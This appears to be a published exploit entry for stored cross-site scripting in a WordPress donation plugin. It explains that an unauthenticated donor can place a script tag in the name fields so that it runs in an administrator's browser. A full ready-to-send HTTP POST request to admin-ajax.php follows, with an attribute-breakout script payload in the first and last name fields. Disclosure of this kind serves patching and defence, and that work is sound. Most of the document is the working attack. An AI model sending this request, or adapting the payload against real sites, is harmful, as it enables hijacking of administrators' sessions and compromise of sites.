## https://sploitus.com/exploit?id=WPEX-ID:E3B23F22-D019-4E20-A238-0FEB59A5760F
Submit a donation as an unauthenticated user with `<script>alert(/XSS/)</script>` in the First Name or Last Name field, then view the donation list as an admin: the stored payload executes in the admin's browser. The request below prefixes the script tag with `">` so that the payload also breaks out of an attribute value where the field is echoed inside one. The form id, nonce and campaign id are per-site values taken from the target's donation page.

```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 501
Connection: close

charitable_form_id=60f1bb21849de&60f1bb21849de=&_charitable_donation_nonce=dd32c048d6&_wp_http_referer=%2Fwordpress%2Fcampaigns%2Ftest%2Fdonate%2F&campaign_id=1148&description=Test&ID=0&gateway=offline&custom_donation_amount=1.00&first_name=test%22%3E%3Cscript%3Ealert(%2FXSS-FN%2F)%3C%2Fscript%3E&last_name=test%22%3E%3Cscript%3Ealert(%2FXSS-LN%2F)%3C%2Fscript%3E&email=fjrekhg%40nferhf.com&address=&address_2=&city=&state=&postcode=&country=AF&phone=&action=make_donation&form_action=make_donation
```